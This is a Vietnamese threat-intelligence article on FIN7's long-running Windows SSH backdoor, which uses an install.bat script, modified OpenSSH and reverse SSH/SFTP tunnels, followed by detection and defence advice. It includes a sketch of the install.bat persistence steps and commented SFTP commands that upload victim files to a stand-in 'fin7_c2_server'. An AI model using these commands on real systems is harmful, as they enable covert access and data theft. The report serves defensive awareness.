Nhóm tội phạm mạng khét tiếng FIN7, còn được biết đến với tên gọi Savage Ladybug, tiếp tục dựa vào hạ tầng Windows SSH backdoor tinh vi. Hạ tầng này duy trì những sửa đổi tối thiểu từ năm 2022. Điều này được xác nhận qua phân tích tình báo về mối đe dọa mạng.

Tác nhân đe dọa này đã duy trì tính nhất quán trong hoạt động của mình. Chúng sử dụng một kịch bản install.bat kết hợp với các bộ công cụ OpenSSH. Mục tiêu là thiết lập các kết nối SSH và SFTP ngược. Điều này giúp chúng duy trì quyền truy cập từ xa một cách lén lút và khả năng trích xuất dữ liệu trên các hệ thống đã bị xâm nhập.

FIN7 và Phương thức Xâm nhập Bền vững

Chiến thuật Ẩn mình và Khai thác OpenSSH

FIN7 đã tạo dựng danh tiếng là một trong những tổ chức tội phạm mạng năng động và có động cơ tài chính mạnh mẽ nhất trên toàn cầu. Nhóm này thường xuyên nhắm mục tiêu vào các công ty bán lẻ, khách sạn và lĩnh vực tài chính.

Việc nhóm tiếp tục sử dụng Windows SSH backdoor minh chứng cho một phương pháp tiếp cận có tính toán. Phương pháp này nhằm duy trì lợi thế chiến thuật và hiệu quả hoạt động trong các chiến dịch của chúng. Bằng cách tận dụng các công cụ SSH hợp pháp được sửa đổi cho mục đích độc hại, tác nhân đe dọa che giấu hoạt động của mình một cách hiệu quả.

Các hoạt động này nằm trong lưu lượng mạng bình thường, khiến việc phát hiện trở nên khó khăn hơn đối với các đội ngũ bảo mật khi đối mặt với loại mối đe dọa mạng tinh vi này. Đặc biệt là những đội ngũ dựa vào các cơ chế phát hiện dựa trên chữ ký truyền thống.

Phương pháp tấn công mà FIN7 sử dụng bao gồm triển khai kịch bản install.bat. Kịch bản này điều phối việc cài đặt và cấu hình bộ OpenSSH đã bị sửa đổi trên các hệ thống Windows. Cách tiếp cận này biến các máy Windows tiêu chuẩn thành các node có khả năng hỗ trợ đường hầm SSH ngược và truyền dữ liệu SFTP.

REM Example of a simplified install.bat logic for OpenSSH client setup
@echo off
SET "SSH_DIR=%PROGRAMFILES%OpenSSH"
IF NOT EXIST "%SSH_DIR%" (
    ECHO Installing OpenSSH client via PowerShell...
    powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0 -ErrorAction SilentlyContinue
)
REM Further configuration might include:
REM - Creating a dedicated user account.
REM - Adding an SSH public key to authorized_keys.
REM - Modifying sshd_config for specific reverse tunnel settings (if acting as server).
REM - Scheduling a task to initiate the reverse SSH connection to a C2 server.

Sự Kiên định trong Kỹ thuật của FIN7

Sau khi được cài đặt, các backdoor này cho phép kẻ tấn công từ xa duy trì quyền truy cập liên tục vào các mạng đã bị xâm nhập. Đồng thời, chúng duy trì một dấu vết pháp y thấp. Kiến trúc SSH ngược đặc biệt hiệu quả vì nó khởi tạo các kết nối đi ra từ mạng nạn nhân. Điều này thường bỏ qua các quy tắc tường lửa được thiết kế để chặn các kết nối đến.

Điều khiến chiến thuật của FIN7 trở nên đáng lo ngại là sự tự tin rõ ràng của nhóm vào hiệu quả của backdoor. Điều này được chứng minh qua việc sửa đổi tối thiểu trong ba năm triển khai liên tục. Thay vì phát triển các công cụ hoàn toàn mới hoặc từ bỏ các kỹ thuật đã được chứng minh, FIN7 đã áp dụng một cách tiếp cận bảo trì thận trọng. Nhóm chỉ thực hiện các thay đổi gia tăng để né tránh các chữ ký phát hiện của nhà cung cấp bảo mật.

Chiến lược này phản ánh thực tế hoạt động rằng hạ tầng tấn công được củng cố kỹ lưỡng, một khi đã được chứng minh là hiệu quả chống lại các biện pháp phòng thủ của tổ chức mục tiêu, vẫn giữ nguyên giá trị ngay cả khi nó đã “trưởng thành”. Đây là một đặc điểm của mối đe dọa mạng bền bỉ.

Cơ chế Duy trì Truy cập và Đánh cắp Dữ liệu

Kỹ thuật Đánh cắp Dữ liệu qua SFTP

Việc tích hợp chức năng SFTP trong khuôn khổ backdoor cung cấp cho các nhà điều hành FIN7 khả năng trích xuất dữ liệu hiệu quả. Các chuyển giao dữ liệu được mã hóa qua SFTP ngụy trang hành vi trộm cắp thành hoạt động SSH hợp pháp. Điều này càng làm phức tạp thêm nỗ lực phát hiện mối đe dọa mạng.

Sự tinh vi về kỹ thuật này cho phép FIN7 duy trì quyền truy cập shell từ xa tương tác. Đồng thời, nhóm có thể thực hiện các chuyển giao dữ liệu quy mô lớn từ các hệ thống bị xâm nhập.

# Example SFTP commands used for data exfiltration from a compromised host
# Assumes SSH key-based authentication is set up for stealth.
# Connect to the C2 SFTP server:
# sftp -i /path/to/id_rsa victim_user@fin7_c2_server
#
# Inside SFTP session, to get remote file to local (on C2):
# get /remote/path/sensitive_data.zip /tmp/exfil/sensitive_data.zip
#
# Alternatively, if SFTP is initiated from the victim to the C2:
# sftp -b - victim_user@fin7_c2_server:/remote/path << EOF
#   put /local/path/to/data/document.docx
#   put /local/path/to/another/file.pdf
#   bye
# EOF

Thách thức trong Phát hiện và Giám sát

Các đội ngũ bảo mật giám sát các mẫu lưu lượng truy cập bất thường có thể bỏ qua hoạt động dựa trên SSH. Hoạt động này thường được coi là thông lệ trong môi trường doanh nghiệp. Do đó, việc phát hiện Windows SSH backdoor này trở nên khó khăn hơn. Đây là một mối đe dọa mạng tiềm ẩn đòi hỏi sự cảnh giác cao độ.

Sự phụ thuộc liên tục vào cơ chế backdoor đã được chứng minh này nhấn mạnh sự tự tin của FIN7 vào hiệu quả của nó. Đồng thời, nó cũng cho thấy tầm quan trọng đối với các đội ngũ bảo mật trong việc duy trì khả năng phát hiện được thiết kế đặc biệt cho các cơ chế duy trì quyền truy cập dựa trên SSH được triển khai trên môi trường Windows, nhằm chống lại loại mối đe dọa mạng dai dẳng này.

Các Biện pháp Phòng thủ và Phát hiện

Giám sát Nâng cao và Phân đoạn Mạng

Các tổ chức đối mặt với khả năng bị FIN7 nhắm mục tiêu nên triển khai giám sát nâng cao các nhật ký xác thực SSH. Cần đặc biệt tập trung vào việc tạo tài khoản bất thường, các lần xác thực thất bại từ các vị trí nguồn không tiêu chuẩn. Ngoài ra, việc phát hiện các cài đặt ứng dụng SSH client không mong muốn trên các hệ thống Windows, nơi hoạt động như vậy thường là bất thường, là rất quan trọng.

Phân đoạn mạng hạn chế kết nối SSH với hạ tầng quản trị được phê duyệt. Kết hợp với các công cụ phân tích hành vi được thiết kế để phát hiện việc thiết lập đường hầm ngược, cung cấp các tư thế phòng thủ hiệu quả chống lại mối đe dọa mạng cụ thể này.

Để tìm hiểu thêm về cách FIN7 duy trì ưu thế thông qua các kỹ thuật bền vững, bạn có thể tham khảo phân tích từ PRODAFT. Đây là một ví dụ về cách các nhóm APT liên tục điều chỉnh kỹ thuật của mình để duy trì một mối đe dọa mạng đáng kể.